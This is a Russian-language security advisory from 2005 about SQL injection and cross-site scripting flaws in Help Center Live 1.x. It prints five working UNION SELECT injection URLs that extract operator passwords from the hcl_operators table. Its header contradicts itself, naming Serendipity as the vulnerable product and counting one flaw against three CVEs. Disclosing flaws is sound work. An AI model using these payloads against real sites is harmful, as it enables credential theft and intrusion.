Security Lab

SQL-инъекция и межсайтовый скриптинг в Help Center Live

Дата публикации:20.05.2005
Всего просмотров:1463
Опасность:
Средняя
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: CVE-2005-1672
CVE-2005-1673
CVE-2005-1674
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
Неавторизованное изменение данных
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Help Center Live 1.x
Уязвимые версии: Serendipity версии до 0.8.1

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных приложения.

SQL-инъекция возможна при выключенной опции magic_quotes_gpc в конфигурационном файле php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения. Примеры:

http://[target]/support/faq/index.php?x=f&id=-
99'%20UNION%20SELECT%200, 0,operator,
password%20FROM%20hcl_operators%20WHERE%201/*

http://[tar get]/support/tt/view.php?tid=-99'%20
UNION%20SELECT%200,0,0,operator,password,
0,0,0,0,0%20FROM%20hcl_operators%20WHERE%201/*

http://[target]/support/tt/download.php?f id=-99'%20
UNION%20SELECT%200,0,0,password,0,operator,0,
0%20FROM%20hcl_operators%20WHERE%20id='1

http://[target]/support/lh/icon.php?status=-99' UNION
SELECT password,password FROM hcl_operators WHERE id=1/*

http://[target]/support/lh/chat_download.php?fid=-99'
UNION SELECT password, operator,password
FROM hcl_operators WHERE id=1/*

Межсайтовый скриптинг возможен из-за недостаточной фильтрации HTML символов в некоторых переменных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

URL производителей: www.helpcentrelive.com

Решение: Установите исправление от производителя.